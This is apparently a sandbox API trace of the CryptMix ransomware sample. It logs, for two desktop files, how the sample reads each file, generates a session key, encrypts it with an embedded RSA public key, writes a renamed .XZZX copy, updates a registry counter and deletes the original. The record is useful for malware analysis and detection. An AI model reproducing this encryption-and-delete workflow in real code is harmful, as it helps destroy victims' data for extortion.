[0167.233] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0 Thread: id = 566 os_tid = 0x90 [0167.238] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0167.238] lstrcpyW (in: lpString1=0x29af460, lpString2="Ya6Z9poxN.swf" | out: lpString1="Ya6Z9poxN.swf") returned="Ya6Z9poxN.swf" [0167.238] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0167.238] SetErrorMode (uMode=0x1) returned 0x1 [0167.238] lstrcpyW (in: lpString1=0x29af860, lpString2="Ya6Z9poxN.swf" | out: lpString1="Ya6Z9poxN.swf") returned="Ya6Z9poxN.swf" [0167.238] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x491669ee, Data2=0x5761, Data3=0x49e9, Data4=([0]=0x9e, [1]=0x16, [2]=0x92, [3]=0x3f, [4]=0x47, [5]=0x21, [6]=0x37, [7]=0x8))) returned 0x0 [0167.238] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ya6Z9poxN.swf") returned 55 [0167.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0167.239] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4F7E052E193A3049491669EE1BD51491.XZZX") returned 79 [0167.239] StrStrW (lpFirst="Ya6Z9poxN.swf", lpSrch="XZZX") returned 0x0 [0167.239] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ya6Z9poxN.swf", dwFileAttributes=0x20) returned 1 [0167.239] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ya6Z9poxN.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ya6z9poxn.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x990 [0167.239] ReadFile (in: hFile=0x990, lpBuffer=0x43b7d70, nNumberOfBytesToRead=0x13cd9, lpNumberOfBytesRead=0x29ae418, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesRead=0x29ae418*=0x13cd9, lpOverlapped=0x0) returned 1 [0167.241] CloseHandle (hObject=0x990) returned 1 [0167.241] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1ca0000 [0167.241] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1cb0000 [0167.241] SetErrorMode (uMode=0x1) returned 0x1 [0167.241] lstrcpyW (in: lpString1=0x29ae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0167.241] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc2b90) returned 1 [0167.244] CryptGenKey (in: hProv=0x3cc2b90, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x43728b8) returned 1 [0167.420] CryptExportKey (in: hKey=0x43728b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ae41c | out: pbData=0x0*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0167.420] CryptExportKey (in: hKey=0x43728b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1cb0000, pdwDataLen=0x29ae41c | out: pbData=0x1cb0000*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0167.420] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0167.420] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0167.420] CryptDestroyKey (hKey=0x43728b8) returned 1 [0167.420] CryptReleaseContext (hProv=0x3cc2b90, dwFlags=0x0) returned 1 [0167.420] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4F7E052E193A3049491669EE1BD51491.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4f7e052e193a3049491669ee1bd51491.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x998 [0167.422] WriteFile (in: hFile=0x998, lpBuffer=0x43b7d70*, nNumberOfBytesToWrite=0x13cd9, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesWritten=0x29ae438*=0x13cd9, lpOverlapped=0x0) returned 1 [0167.423] SetFilePointer (in: hFile=0x998, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x13cd9 [0167.423] WriteFile (in: hFile=0x998, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0167.424] SetFilePointer (in: hFile=0x998, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x13cde [0167.424] WriteFile (in: hFile=0x998, lpBuffer=0x29af860*, nNumberOfBytesToWrite=0x1a, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x29af860*, lpNumberOfBytesWritten=0x29ae438*=0x1a, lpOverlapped=0x0) returned 1 [0167.424] SetFilePointer (in: hFile=0x998, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x13cf8 [0167.424] WriteFile (in: hFile=0x998, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0167.424] SetFilePointer (in: hFile=0x998, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x13cfd [0167.424] SetErrorMode (uMode=0x1) returned 0x1 [0167.424] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0167.424] OutputDebugStringW (lpOutputString="end") [0167.424] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x80\x8cÊ\x03`Õ\x9a\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0167.424] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x29adbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8 | out: pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8) returned 1 [0167.424] CryptAcquireContextW (in: phProv=0x29ad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x29ad3e4*=0x3cc2b90) returned 1 [0167.425] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc2b90, dwCertEncodingType=0x1, pInfo=0x437f228*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x437f258*, PublicKey.cbData=0x8c, PublicKey.pbData=0x437f260*, PublicKey.cUnusedBits=0x0), phKey=0x29ad3ec | out: phKey=0x29ad3ec*=0x4372bb8) returned 1 [0167.425] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0167.425] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0167.425] CryptEncrypt (in: hKey=0x4372bb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x29ad3f0*=0x80) returned 1 [0167.425] CryptEncrypt (in: hKey=0x4372bb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc2c18*, pdwDataLen=0x29ad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc2c18*, pdwDataLen=0x29ad3e8*=0x80) returned 1 [0167.425] WriteFile (in: hFile=0x998, lpBuffer=0x3cc2c18*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x3cc2c18*, lpNumberOfBytesWritten=0x29ae438*=0x80, lpOverlapped=0x0) returned 1 [0167.425] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0167.425] WriteFile (in: hFile=0x998, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0167.425] GetUserNameW (in: lpBuffer=0x29ae1f8, pcbBuffer=0x29adfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29adfe0) returned 1 [0167.425] wsprintfW (in: param_1=0x29adff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0167.425] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe4 | out: phkResult=0x29adfe4*=0x99c) returned 0x0 [0167.426] RegQueryValueExW (in: hKey=0x99c, lpValueName="E1010314", lpReserved=0x0, lpType=0x29adfd8, lpData=0x29adfec, lpcbData=0x29adfdc*=0x4 | out: lpType=0x29adfd8*=0x4, lpData=0x29adfec*=0xf1, lpcbData=0x29adfdc*=0x4) returned 0x0 [0167.426] RegCloseKey (hKey=0x99c) returned 0x0 [0167.426] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe8 | out: phkResult=0x29adfe8*=0x99c) returned 0x0 [0167.426] RegSetValueExW (in: hKey=0x99c, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x29adfec*=0xf2, cbData=0x4 | out: lpData=0x29adfec*=0xf2) returned 0x0 [0167.426] RegCloseKey (hKey=0x99c) returned 0x0 [0167.426] VirtualFree (lpAddress=0x1ca0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0167.426] VirtualFree (lpAddress=0x1cb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0167.426] CloseHandle (hObject=0x998) returned 1 [0167.426] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0167.427] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0167.427] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ya6Z9poxN.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ya6z9poxn.swf")) returned 1 [0167.427] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ya6Z9poxN.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ya6z9poxn.swf")) returned 0 Thread: id = 567 os_tid = 0x500 [0167.430] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0167.430] lstrcpyW (in: lpString1=0x2aaf460, lpString2="ym0OWp.ods" | out: lpString1="ym0OWp.ods") returned="ym0OWp.ods" [0167.430] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0167.430] SetErrorMode (uMode=0x1) returned 0x1 [0167.430] lstrcpyW (in: lpString1=0x2aaf860, lpString2="ym0OWp.ods" | out: lpString1="ym0OWp.ods") returned="ym0OWp.ods" [0167.430] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0xe0b0b6d3, Data2=0x5fdb, Data3=0x469a, Data4=([0]=0xbf, [1]=0x3c, [2]=0x76, [3]=0x56, [4]=0xc9, [5]=0x16, [6]=0x95, [7]=0x98))) returned 0x0 [0167.430] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ym0OWp.ods") returned 52 [0167.430] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0167.430] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CB04B3811A6F8BBEE0B0B6D31D1A7006.XZZX") returned 79 [0167.430] StrStrW (lpFirst="ym0OWp.ods", lpSrch="XZZX") returned 0x0 [0167.430] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ym0OWp.ods", dwFileAttributes=0x20) returned 1 [0167.431] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ym0OWp.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ym0owp.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x97c [0167.431] ReadFile (in: hFile=0x97c, lpBuffer=0x3de740, nNumberOfBytesToRead=0x1315, lpNumberOfBytesRead=0x2aae418, lpOverlapped=0x0 | out: lpBuffer=0x3de740*, lpNumberOfBytesRead=0x2aae418*=0x1315, lpOverlapped=0x0) returned 1 [0167.432] CloseHandle (hObject=0x97c) returned 1 [0167.432] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1c60000 [0167.432] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1c70000 [0167.432] SetErrorMode (uMode=0x1) returned 0x1 [0167.432] lstrcpyW (in: lpString1=0x2aae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0167.432] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc2ca0) returned 1 [0167.434] CryptGenKey (in: hProv=0x3cc2ca0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x43728b8) returned 1 [0167.519] CryptExportKey (in: hKey=0x43728b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x2aae41c | out: pbData=0x0*, pdwDataLen=0x2aae41c*=0x94) returned 1 [0167.519] CryptExportKey (in: hKey=0x43728b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1c70000, pdwDataLen=0x2aae41c | out: pbData=0x1c70000*, pdwDataLen=0x2aae41c*=0x94) returned 1 [0167.519] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0167.519] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0167.519] CryptDestroyKey (hKey=0x43728b8) returned 1 [0167.520] CryptReleaseContext (hProv=0x3cc2ca0, dwFlags=0x0) returned 1 [0167.520] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CB04B3811A6F8BBEE0B0B6D31D1A7006.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cb04b3811a6f8bbee0b0b6d31d1a7006.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x97c [0167.520] WriteFile (in: hFile=0x97c, lpBuffer=0x3de740*, nNumberOfBytesToWrite=0x1315, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x3de740*, lpNumberOfBytesWritten=0x2aae438*=0x1315, lpOverlapped=0x0) returned 1 [0167.520] SetFilePointer (in: hFile=0x97c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1315 [0167.520] WriteFile (in: hFile=0x97c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x2aae438*=0x5, lpOverlapped=0x0) returned 1 [0167.520] SetFilePointer (in: hFile=0x97c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x131a [0167.520] WriteFile (in: hFile=0x97c, lpBuffer=0x2aaf860*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x2aaf860*, lpNumberOfBytesWritten=0x2aae438*=0x14, lpOverlapped=0x0) returned 1 [0167.521] SetFilePointer (in: hFile=0x97c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x132e [0167.521] WriteFile (in: hFile=0x97c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x2aae438*=0x5, lpOverlapped=0x0) returned 1 [0167.521] SetFilePointer (in: hFile=0x97c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1333 [0167.521] SetErrorMode (uMode=0x1) returned 0x1 [0167.521] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0167.521] OutputDebugStringW (lpOutputString="end") [0167.521] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x80\x8cÊ\x03`Õª\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x2aadbf4, pcbBinary=0x2aad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2aadbf4, pcbBinary=0x2aad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0167.521] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2aadbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2aad3dc, pcbStructInfo=0x2aad3d8 | out: pvStructInfo=0x2aad3dc, pcbStructInfo=0x2aad3d8) returned 1 [0167.521] CryptAcquireContextW (in: phProv=0x2aad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2aad3e4*=0x3cc2ca0) returned 1 [0167.521] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc2ca0, dwCertEncodingType=0x1, pInfo=0x437f2f8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x437f328*, PublicKey.cbData=0x8c, PublicKey.pbData=0x437f330*, PublicKey.cUnusedBits=0x0), phKey=0x2aad3ec | out: phKey=0x2aad3ec*=0x4372bf8) returned 1 [0167.522] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0167.522] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0167.522] CryptEncrypt (in: hKey=0x4372bf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2aad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x2aad3f0*=0x80) returned 1 [0167.522] CryptEncrypt (in: hKey=0x4372bf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc2d28*, pdwDataLen=0x2aad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc2d28*, pdwDataLen=0x2aad3e8*=0x80) returned 1 [0167.522] WriteFile (in: hFile=0x97c, lpBuffer=0x3cc2d28*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x3cc2d28*, lpNumberOfBytesWritten=0x2aae438*=0x80, lpOverlapped=0x0) returned 1 [0167.522] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0167.522] WriteFile (in: hFile=0x97c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x2aae438*=0x5, lpOverlapped=0x0) returned 1 [0167.522] GetUserNameW (in: lpBuffer=0x2aae1f8, pcbBuffer=0x2aadfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x2aadfe0) returned 1 [0167.522] wsprintfW (in: param_1=0x2aadff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0167.522] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x2aadfe4 | out: phkResult=0x2aadfe4*=0x99c) returned 0x0 [0167.522] RegQueryValueExW (in: hKey=0x99c, lpValueName="E1010314", lpReserved=0x0, lpType=0x2aadfd8, lpData=0x2aadfec, lpcbData=0x2aadfdc*=0x4 | out: lpType=0x2aadfd8*=0x4, lpData=0x2aadfec*=0xf2, lpcbData=0x2aadfdc*=0x4) returned 0x0 [0167.522] RegCloseKey (hKey=0x99c) returned 0x0 [0167.523] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x2aadfe8 | out: phkResult=0x2aadfe8*=0x99c) returned 0x0 [0167.523] RegSetValueExW (in: hKey=0x99c, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x2aadfec*=0xf3, cbData=0x4 | out: lpData=0x2aadfec*=0xf3) returned 0x0 [0167.523] RegCloseKey (hKey=0x99c) returned 0x0 [0167.523] VirtualFree (lpAddress=0x1c60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0167.523] VirtualFree (lpAddress=0x1c70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0167.523] CloseHandle (hObject=0x97c) returned 1 [0167.523] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0167.523] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0167.524] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ym0OWp.ods" 